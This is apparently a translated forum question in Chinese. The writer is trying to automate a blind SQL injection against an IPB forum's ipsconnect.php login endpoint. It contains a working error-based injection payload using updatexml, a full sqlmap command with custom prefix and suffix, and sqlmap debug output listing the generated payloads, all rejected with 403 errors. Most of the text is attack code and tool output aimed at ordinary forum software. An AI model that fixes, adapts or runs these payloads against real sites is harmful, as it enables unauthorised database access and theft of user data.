我想在ipb论坛中进行盲目SQL注入。用手可以正常工作,但是那太长了。而且我尝试使用sqlmap。但是我无法得到正确的要求。它必须采用以下格式:
1111) and 0="'" and updatexml(NULL,concat(0x3a, (SELECT @@version) ) ,NULL)-- -'
执行选择@@版本的SQL查询。 Updatexml只是示例,其他方法也可以。
sqlmap.py -u "http://example.com/interface/ipsconnect/ipsconnect.php" --data "act=login&idType=id&id[]=1111" --suffix="-- -'" --dbms=mysql -v3 --technique=B --prefix=") and "'" and "" --level 5 --risk 3 -p id[]
但是它会生成错误的请求,例如:
[09:12:05] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:05] [WARNING] heuristic (basic) test shows that POST parameter 'id[]' might not be injectable
[09:12:05] [PAYLOAD] 1111) and ' and 'BLvfen<'">pylcPB-- -'
[09:12:05] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:05] [INFO] testing for SQL injection on POST parameter 'id[]'
[09:12:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:12:05] [PAYLOAD] 1111) and ' and AND 1732=2317-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] 1111) and ' and AND 5551=5551-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[09:12:06] [PAYLOAD] -2700) and ' and OR 6220=5854-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] -5459) and ' and OR 4862=4862-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[09:12:06] [PAYLOAD] 1111) and ' and OR NOT 4347=4111-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] 1111) and ' and OR NOT 6303=6303-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:12:06] [PAYLOAD] 1111) and ' and AND 7850=(SELECT (CASE WHEN (7850=7860) THEN 7850 ELSE (SELECT 7860 UNION SELECT 1139) END))-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [PAYLOAD] 1111) and ' and AND 4417=(SELECT (CASE WHEN (4417=4417) THEN 4417 ELSE (SELECT 7307 UNION SELECT 1910) END))-- -'
[09:12:06] [DEBUG] got HTTP error code: 403 (HTTPError: Forbidden)
[09:12:06] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[09:12:06] [PAYLOAD] -6639) and ' and OR 4761=(SELECT (CASE WHEN (4761=4384) THEN 4761 ELSE (SELECT 4384 UNION SELECT 4595) END))-- -'
首先,and语句之间缺少双引号。对我来说,sqlmap不使用任何sleep或rlike来提取数据似乎很奇怪。但是,我指定了盲注技术。我对sqlmap不太熟悉,所以我一定做错了:D 我的猜测是,前缀中的双引号有问题。这是在Windows计算机上运行。也许可以在Linux上尝试?